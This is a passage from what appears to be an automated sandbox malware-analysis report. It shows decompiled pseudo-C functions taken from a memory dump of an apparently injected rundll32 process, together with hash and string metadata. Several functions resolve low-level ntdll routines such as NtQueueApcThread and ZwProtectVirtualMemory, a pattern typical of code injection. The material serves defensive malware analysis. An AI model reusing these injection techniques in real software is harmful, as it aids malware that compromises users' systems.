                				if (_t119 == 0) goto 0xc809a069;
                				GetProcAddress(??, ??);
                				_v120 = _v120 & 0x00000000;
                				r9d = 0;
                				 *_t119();
                				goto 0xc809a069;
                				if (_v96 == 0) goto 0xc809a083;
                				GetCurrentProcess();
                				E00000285285C809AB18();
                				if (_v80 == 0) goto 0xc809a092;
                				CloseHandle(??);
                				if (_v104 == 0) goto 0xc809a0a8;
                				GetCurrentProcess();
                				E00000285285C809AB18();
                				if (_t158 == 0) goto 0xc809a0b6;
                				CloseHandle(??);
                				return _t71;
                			}

                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: NtQueueApcThread$is program cannot be run in DOS mode.$$ntdll.dll
                • API String ID: 0-1695160815
                • Opcode ID: 72dd9db284d4b49726d962a1c0c1ae00b7df737b2805ddc23eb7aca9e6c6e65f
                • Instruction ID: 027a8ac155976b855acda79acc3ffd70ccbdace98c9ac0c9d92f8c2712c83886
                • Opcode Fuzzy Hash: 72dd9db284d4b49726d962a1c0c1ae00b7df737b2805ddc23eb7aca9e6c6e65f
                • Instruction Fuzzy Hash: 0A81C17AB01F6186EB00DF69D8496AC37A4FB99B88F00D226DE1C63755EF38D195CB40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00000285285C80DDCCC(void* __edx, char* __r8, void* __r9) {
                				void* _t7;
                				signed long long _t11;
                				signed long long _t12;
                				void* _t16;
                				void* _t18;
                
                				_t17 = _t18 - 0x4f;
                				_t19 = _t18 - 0xc0;
                				_t11 =  *0xc814c720; // 0xee50a592130
                				_t12 = _t11 ^ _t18 - 0x000000c0;
                				 *(_t18 - 0x4f + 0x3f) = _t12;
                				if (__r9 - _t12 + 4 >= 0) goto 0xc80ddd18;
                				 *__r8 = 0;
                				return E00000285285C80C59D0(_t7,  *(_t17 + 0x3f) ^ _t19, _t16, __r8);
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                • API String ID: 3215553584-2617248754
                • Opcode ID: 4cb90ac43a2d371ea456af3117a8e3444dba1b3e1e03e2e308f5dc0d4b1960e1
                • Instruction ID: 76eab542277d6291102fed3703e3a6a6f6dc938b6ce7571890fbbbc1d68f8963
                • Opcode Fuzzy Hash: 4cb90ac43a2d371ea456af3117a8e3444dba1b3e1e03e2e308f5dc0d4b1960e1
                • Instruction Fuzzy Hash: 5B418B7AA12F6499EB04CF25E88578A37E4E718798F01812BEE5817B95EE3CC025C744
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 33%
                			E00000285285C8099CF0(long long __rax, long long __rbx, void* __rcx, long long __rsi, long long _a8, long long _a16) {
                				void* _t16;
                				void* _t17;
                				void* _t18;
                				long long _t27;
                				long long _t29;
                				void* _t44;
                				void* _t51;
                				void* _t52;
                
                				_t27 = __rax;
                				_a8 = __rbx;
                				_a16 = __rsi;
                				_t16 =  *0xc81532d0 - _t44; // 0x0
                				if (_t16 == 0) goto 0xc8099d23;
                				_t17 =  *0xc81532d8 - _t44; // 0x0
                				if (_t17 == 0) goto 0xc8099d23;
                				_t18 =  *0xc81532e0 - _t44; // 0x0
                				if (_t18 != 0) goto 0xc8099de4;
                				GetModuleHandleW(??);
                				_t29 = __rax;
                				if (__rax == 0) goto 0xc8099e06;
                				GetModuleHandleW(??);
                				if (__rax == 0) goto 0xc8099e06;
                				E00000285285C809A2DC(__rax, __rax, __rax, "LdrLoadDll", _t51, _t52);
                				 *0xc81532d0 = _t27;
                				if (_t27 == 0) goto 0xc8099e06;
                				E00000285285C809A2DC(_t27, _t29, _t29, "LdrGetProcedureAddress", _t51, _t52);
                				 *0xc81532d8 = _t27;
                				if (_t27 == 0) goto 0xc8099e06;
                				E00000285285C809A2DC(_t27, _t29, _t29, "ZwProtectVirtualMemory", _t51, _t52);
                				 *0xc81532e0 = _t27;
                				if (_t27 == 0) goto 0xc8099e06;
                				E00000285285C809A2DC(_t27, _t29, _t29, "RtlAnsiStringToUnicodeString", _t51, _t52);
                				 *0xc81532e8 = _t27;
                				if (_t27 == 0) goto 0xc8099e06;
                				E00000285285C809A2DC(_t27, _t29, _t29, "RtlFreeUnicodeString", _t51, _t52);
                				 *0xc81532f0 = _t27;
                				if (_t27 == 0) goto 0xc8099e06;
                				asm("movups xmm0, [0xb94e5]");
                				asm("movups [esi], xmm0");
                				asm("movups xmm1, [0xb94eb]");
                				asm("movups [esi+0x10], xmm1");
                				asm("movsd xmm0, [0xb94ef]");
                				asm("movsd [esi+0x20], xmm0");
                				return 0;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: HandleModule
                • String ID: LdrGetProcedureAddress$LdrLoadDll$RtlAnsiStringToUnicodeString$RtlFreeUnicodeString$ZwProtectVirtualMemory$kernel32.dll$ntdll.dll
                • API String ID: 4139908857-3936008073
                • Opcode ID: c5a052427b3ec778cdb5bb9aa685819040ed37b6c136b296b2a08f91c9af0b8e
                • Instruction ID: a3aca1754a0c3c29b0695830e9434583104190e3e689942191cfdd759c56d5b0
                • Opcode Fuzzy Hash: c5a052427b3ec778cdb5bb9aa685819040ed37b6c136b296b2a08f91c9af0b8e
                • Instruction Fuzzy Hash: 40318F3C613FA580FA51DB19B84936463E0EB467C0F48D227986D173A2EF7CE095CB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 40%
                			E00000285285C8057CB0(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long __r8, signed char** __r9, long long _a8, long long _a16, long long _a24) {
                				void* _v8;
                				signed int _v272;
                				intOrPtr _v292;
                				long long _v304;
                				char _v312;
                				void* __rdi;
                				signed int _t21;
                				void* _t30;
                				void* _t33;
                				void* _t34;
                				signed char** _t43;
                				void* _t64;
                
                				_a8 = __rbx;
                				_a16 = __rbp;
                				_a24 = __rsi;
                				_t64 = __rcx;
                				r8d = 0x128;
                				_t43 = __r9;
                				E00000285285C80C8EF0(_t30, 0, _t33, _t34,  &_v312, __rdx, __r8, __r8);
                				if ( *((long long*)(__r8 + 0x18)) - 0x10 < 0) goto 0xc8057cf1;
                				goto 0xc8057cf4;
                				_v304 = __r8;
                				_v292 =  *((intOrPtr*)(__r8 + 0x10));
                				if (_t43[2] == 0) goto 0xc8057d31;
                				if (_t43[3] - 0x10 < 0) goto 0xc8057d11;
                				asm("o16 nop [eax+eax]");
                				_t21 =  *( *_t43) & 0x000000ff;
                				_v272 = _t21;
                				if (_t21 != 0) goto 0xc8057d20;
                				GetModuleHandleW(??);
                				GetProcAddress(??, ??);
                				GetProcAddress(??, ??);
                				 *((long long*)(__r8))();
                				 *((long long*)(__r8))();
                				if (_t64 == 0) goto 0xc8057d8b;
                				E00000285285C8099E18(__r8,  &_v312, "NtResumeProcess", __rdx, _t64);
                				CloseHandle(??);
                				return 1;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleProc$CloseModule
                • String ID: NtResumeProcess$RtlNtStatusToDosError$ntdll.dll
                • API String ID: 133214361-1717905385
                • Opcode ID: 6030877f1eb43a60b0b866ad09762e0b622c24f5cde4c8e934917fe96ebc2ba6
                • Instruction ID: 762112d5e9f197123531ceefa792b3eb3227e9a0450e0458a3d535b3b39a7484
                • Opcode Fuzzy Hash: 6030877f1eb43a60b0b866ad09762e0b622c24f5cde4c8e934917fe96ebc2ba6
                • Instruction Fuzzy Hash: B6217A3A206FA081EB00DF21E4487A96360F74AFC1F488022DE4D53799DF3DC65ACB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 61%
                			E00000285285C80A9A44(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000285285C80A19DC(0,  &_a16);
                				_t79 =  *0xc8151bf8; // 0x0
                				_a24 = _t79;
                				_t56 =  *0xc8151b48; // 0x0
                				if (_t56 != 0) goto 0xc80a9abf;
                				E00000285285C80A19DC(0,  &_a8);
                				_t43 =  *0xc8151b48 - _t56; // 0x0
                				if (_t43 != 0) goto 0xc80a9aae;
                				_t26 =  *0xc8151908; // 0x0
                				 *0xc8151908 = _t26 + 1;
                				 *0xc8151b48 = _t51;
                				_t29 = E00000285285C80A1A5C(_t51,  &_a8);
                				_t57 =  *0xc8151b48; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0xc80a9ad3;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0xc80a9ad5;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0xc80a9b62;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0xc80a9afb;
                				E00000285285C80A6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0xc80a9af9;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0xc80a9afb;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0xc80a9b62;
                				if (_t79 == 0) goto 0xc80a9b0a;
                				goto 0xc80a9b62;
                				E00000285285C80AC5D8(0, 0, _t57,  &_a24, _t80);
                				if (_t53 != 0xffffffff) goto 0xc80a9b39;
                				E00000285285C8087290( &_v48);
                				E00000285285C80C9940(_t57,  &_v48, 0xc813bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0xc8151bf8 = _t78;
                				0xc80c5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000285285C80A1A5C(E00000285285C80A6C88(_t53, _t78),  &_a16);
                			}

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmoneypunct
                • String ID:
                • API String ID: 18546225-0
                • Opcode ID: 8ee8e92f85bc13cf56f8620e03493eee014d88c90192d00410b336b4615e4c64
                • Instruction ID: b736d0cc8ab3d9e9520fed24427ef3522a0c56d9a1deda62c2fa166d3d9640e4
                • Opcode Fuzzy Hash: 8ee8e92f85bc13cf56f8620e03493eee014d88c90192d00410b336b4615e4c64
                • Instruction Fuzzy Hash: 2D31932A717F2081FB11DB15D5482D967A5E790BE0F18C2539A7D537E9DE3CD442CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 61%
                			E00000285285C80A9B7C(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000285285C80A19DC(0,  &_a16);
                				_t79 =  *0xc8151bf0; // 0x0
                				_a24 = _t79;
                				_t56 =  *0xc8151b40; // 0x0
                				if (_t56 != 0) goto 0xc80a9bf7;
                				E00000285285C80A19DC(0,  &_a8);
                				_t43 =  *0xc8151b40 - _t56; // 0x0
                				if (_t43 != 0) goto 0xc80a9be6;
                				_t26 =  *0xc8151908; // 0x0
                				 *0xc8151908 = _t26 + 1;
                				 *0xc8151b40 = _t51;
                				_t29 = E00000285285C80A1A5C(_t51,  &_a8);
                				_t57 =  *0xc8151b40; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0xc80a9c0b;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0xc80a9c0d;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0xc80a9c9a;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0xc80a9c33;
                				E00000285285C80A6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0xc80a9c31;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0xc80a9c33;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0xc80a9c9a;
                				if (_t79 == 0) goto 0xc80a9c42;
                				goto 0xc80a9c9a;
                				E00000285285C80AC6B8(0, 0, _t57,  &_a24, _t80);
                				if (_t53 != 0xffffffff) goto 0xc80a9c71;
                				E00000285285C8087290( &_v48);
                				E00000285285C80C9940(_t57,  &_v48, 0xc813bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0xc8151bf0 = _t78;
                				0xc80c5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000285285C80A1A5C(E00000285285C80A6C88(_t53, _t78),  &_a16);
                			}

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmoneypunct
                • String ID:
                • API String ID: 18546225-0
                • Opcode ID: 80598fde0bb3a3ce3bf89a3434307d2caafd29aec3bc1fd403d5fcc1c0951c5a
                • Instruction ID: 3e5bafb773d9ba9b8eec6a4ee98544f35f56f7a8b6c9347bb05eca15ea357903
                • Opcode Fuzzy Hash: 80598fde0bb3a3ce3bf89a3434307d2caafd29aec3bc1fd403d5fcc1c0951c5a
                • Instruction Fuzzy Hash: F7313C2E307F2081EB119B15E9583E967A5E794BE0F58C253EA6D176E9DE3CD4428B00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000285285C80A9CB4(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000285285C80A19DC(0,  &_a16);
                				_t79 =  *0xc8151c18; // 0x0
                				_a24 = _t79;
                				_t56 =  *0xc8151b58; // 0x0
                				if (_t56 != 0) goto 0xc80a9d2f;
                				E00000285285C80A19DC(0,  &_a8);
                				_t43 =  *0xc8151b58 - _t56; // 0x0
                				if (_t43 != 0) goto 0xc80a9d1e;
                				_t26 =  *0xc8151908; // 0x0
                				 *0xc8151908 = _t26 + 1;
                				 *0xc8151b58 = _t51;
                				_t29 = E00000285285C80A1A5C(_t51,  &_a8);
                				_t57 =  *0xc8151b58; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0xc80a9d43;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0xc80a9d45;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0xc80a9dd2;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0xc80a9d6b;
                				E00000285285C80A6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0xc80a9d69;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0xc80a9d6b;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0xc80a9dd2;
                				if (_t79 == 0) goto 0xc80a9d7a;
                				goto 0xc80a9dd2;
                				E00000285285C80AC798(0, 0, _t57,  &_a24, _t80, _t79, _t80);
                				if (_t53 != 0xffffffff) goto 0xc80a9da9;
                				E00000285285C8087290( &_v48);
                				E00000285285C80C9940(_t57,  &_v48, 0xc813bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0xc8151c18 = _t78;
                				0xc80c5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000285285C80A1A5C(E00000285285C80A6C88(_t53, _t78),  &_a16);
                			}




















                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: ff68216057d0b6a146dc5d729bf5b4c090140f84096e764e23b169909508c765
                • Instruction ID: 104ceb6515759f92c0efb2046dded9b641105c295a2e1af0b638cd3a3885cdfd
                • Opcode Fuzzy Hash: ff68216057d0b6a146dc5d729bf5b4c090140f84096e764e23b169909508c765
                • Instruction Fuzzy Hash: 5931822A707F6081EB11DB16D9482D967A1E780BE0F188253DA6D177EADE3CD482CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000285285C80A1D0C(intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t42;
                				intOrPtr _t50;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t55;
                				signed long long _t56;
                				intOrPtr _t63;
                				intOrPtr* _t77;
                				long long _t78;
                				void* _t79;
                
                				_t50 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t79 = __rcx;
                				E00000285285C80A19DC(0,  &_a16);
                				_t78 =  *0xc81518f8; // 0x0
                				_a24 = _t78;
                				_t55 =  *0xc81518d8; // 0x0
                				if (_t55 != 0) goto 0xc80a1d87;
                				E00000285285C80A19DC(0,  &_a8);
                				_t42 =  *0xc81518d8 - _t55; // 0x0
                				if (_t42 != 0) goto 0xc80a1d76;
                				_t26 =  *0xc8151908; // 0x0
                				 *0xc8151908 = _t26 + 1;
                				 *0xc81518d8 = _t50;
                				_t29 = E00000285285C80A1A5C(_t50,  &_a8);
                				_t56 =  *0xc81518d8; // 0x0
                				_t63 = _a8;
                				if (_t56 -  *((intOrPtr*)(_t63 + 0x18)) >= 0) goto 0xc80a1d9b;
                				_t51 =  *((intOrPtr*)(_t63 + 0x10));
                				goto 0xc80a1d9d;
                				if ( *((intOrPtr*)(_t51 + _t56 * 8)) != 0) goto 0xc80a1e2a;
                				if ( *((intOrPtr*)(_t63 + 0x24)) == dil) goto 0xc80a1dc3;
                				E00000285285C80A6CC0(_t29);
                				if (_t56 -  *((intOrPtr*)(_t51 + 0x18)) >= 0) goto 0xc80a1dc1;
                				_t52 =  *((intOrPtr*)(_t51 + 0x10));
                				goto 0xc80a1dc3;
                				if ( *((intOrPtr*)(_t52 + _t56 * 8)) != 0) goto 0xc80a1e2a;
                				if (_t78 == 0) goto 0xc80a1dd2;
                				goto 0xc80a1e2a;
                				E00000285285C80A2824(0, 0, _t56,  &_a24, _t79, _t78, _t79);
                				if (_t52 != 0xffffffff) goto 0xc80a1e01;
                				E00000285285C8087290( &_v48);
                				E00000285285C80C9940(_t56,  &_v48, 0xc813bb90, _t78);
                				asm("int3");
                				_t77 = _a24;
                				 *0xc81518f8 = _t77;
                				0xc80c5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t77 + 8))))();
                				return E00000285285C80A1A5C(E00000285285C80A6C88(_t52, _t77),  &_a16);
                			}




















                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 9d32b79da59d5c104d6bc5ce0d3d347c89ccd3b94439e08162b083fa72e03bc8
                • Instruction ID: fe15484f402ce7abcc1b9cd0785ff80db6e7ccf79f02d05ee074b1ded7d6e22b
                • Opcode Fuzzy Hash: 9d32b79da59d5c104d6bc5ce0d3d347c89ccd3b94439e08162b083fa72e03bc8
                • Instruction Fuzzy Hash: C831982A607F6081FB11DB15D5482E967A1E7957F0F588253DA6E13BEADE3CC442CF00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000285285C80A9DEC(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000285285C80A19DC(0,  &_a16);
                				_t79 =  *0xc8151bb8; // 0x0
                				_a24 = _t79;
                				_t56 =  *0xc8151b08; // 0x0
                				if (_t56 != 0) goto 0xc80a9e67;
                				E00000285285C80A19DC(0,  &_a8);
                				_t43 =  *0xc8151b08 - _t56; // 0x0
                				if (_t43 != 0) goto 0xc80a9e56;
                				_t26 =  *0xc8151908; // 0x0
                				 *0xc8151908 = _t26 + 1;
                				 *0xc8151b08 = _t51;
                				_t29 = E00000285285C80A1A5C(_t51,  &_a8);
                				_t57 =  *0xc8151b08; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0xc80a9e7b;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0xc80a9e7d;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0xc80a9f0a;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0xc80a9ea3;
                				E00000285285C80A6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0xc80a9ea1;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0xc80a9ea3;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0xc80a9f0a;
                				if (_t79 == 0) goto 0xc80a9eb2;
                				goto 0xc80a9f0a;
                				E00000285285C80AC85C(0, 0, _t57,  &_a24, _t80, _t79, _t80);
                				if (_t53 != 0xffffffff) goto 0xc80a9ee1;
                				E00000285285C8087290( &_v48);
                				E00000285285C80C9940(_t57,  &_v48, 0xc813bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0xc8151bb8 = _t78;
                				0xc80c5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000285285C80A1A5C(E00000285285C80A6C88(_t53, _t78),  &_a16);
                			}




















                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: ddc823b0c55ebac6424c7150eb9c8b3a4dd77a85adfbbfdd4ed5a563a1c2915b
                • Instruction ID: 10b4064ebbb95ba163f74e56999522ee92cca4cd8e2d3f8ea7e0dc1b9b01dfd1
                • Opcode Fuzzy Hash: ddc823b0c55ebac6424c7150eb9c8b3a4dd77a85adfbbfdd4ed5a563a1c2915b
                • Instruction Fuzzy Hash: 8C31722A707F2081FB11DB15D5482E963A5E795BE0F188253EA6D13BEADE3CD952CF00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000285285C80A1E44(intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t42;
                				intOrPtr _t50;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t55;
                				signed long long _t56;
                				intOrPtr _t63;
                				intOrPtr* _t77;
                				long long _t78;
                				void* _t79;
                
                				_t50 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t79 = __rcx;
                				E00000285285C80A19DC(0,  &_a16);
                				_t78 =  *0xc81518e0; // 0x0
                				_a24 = _t78;
                				_t55 =  *0xc81518d0; // 0x0
                				if (_t55 != 0) goto 0xc80a1ebf;
                				E00000285285C80A19DC(0,  &_a8);
                				_t42 =  *0xc81518d0 - _t55; // 0x0
                				if (_t42 != 0) goto 0xc80a1eae;
                				_t26 =  *0xc8151908; // 0x0
                				 *0xc8151908 = _t26 + 1;
                				 *0xc81518d0 = _t50;
                				_t29 = E00000285285C80A1A5C(_t50,  &_a8);
                				_t56 =  *0xc81518d0; // 0x0
                				_t63 = _a8;
                				if (_t56 -  *((intOrPtr*)(_t63 + 0x18)) >= 0) goto 0xc80a1ed3;
                				_t51 =  *((intOrPtr*)(_t63 + 0x10));
                				goto 0xc80a1ed5;
                				if ( *((intOrPtr*)(_t51 + _t56 * 8)) != 0) goto 0xc80a1f62;
                				if ( *((intOrPtr*)(_t63 + 0x24)) == dil) goto 0xc80a1efb;
                				E00000285285C80A6CC0(_t29);
                				if (_t56 -  *((intOrPtr*)(_t51 + 0x18)) >= 0) goto 0xc80a1ef9;
                				_t52 =  *((intOrPtr*)(_t51 + 0x10));
                				goto 0xc80a1efb;
                				if ( *((intOrPtr*)(_t52 + _t56 * 8)) != 0) goto 0xc80a1f62;
                				if (_t78 == 0) goto 0xc80a1f0a;
                				goto 0xc80a1f62;
                				E00000285285C80A28E8(0, 0, _t56,  &_a24, _t79, _t78, _t79);
                				if (_t52 != 0xffffffff) goto 0xc80a1f39;
                				E00000285285C8087290( &_v48);
                				E00000285285C80C9940(_t56,  &_v48, 0xc813bb90, _t78);
                				asm("int3");
                				_t77 = _a24;
                				 *0xc81518e0 = _t77;
                				0xc80c5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t77 + 8))))();
                				return E00000285285C80A1A5C(E00000285285C80A6C88(_t52, _t77),  &_a16);
                			}




















                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 9f7d957f0ffcc9841b217795bd5a469e617d2d6f12b071e1f2693da6535ece72
                • Instruction ID: 8b8783ec85d136800466ee394eadcfc6b72915556afaecee9c9787b70152e6f3
                • Opcode Fuzzy Hash: 9f7d957f0ffcc9841b217795bd5a469e617d2d6f12b071e1f2693da6535ece72
                • Instruction Fuzzy Hash: 5531692A607F6081FB21DB16E5482E967A1E7947E0F588253DA6E177EADF3CC446CF00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00000285285C8097C20(signed int __edx, void* __eflags, void* __rcx) {
                				void* _v72;
                				signed char _t8;
                				signed int _t10;
                
                				_t10 = __edx & 0x00000017;
                				 *(__rcx + 0x10) = _t10;
                				_t8 =  *(__rcx + 0x14) & _t10;
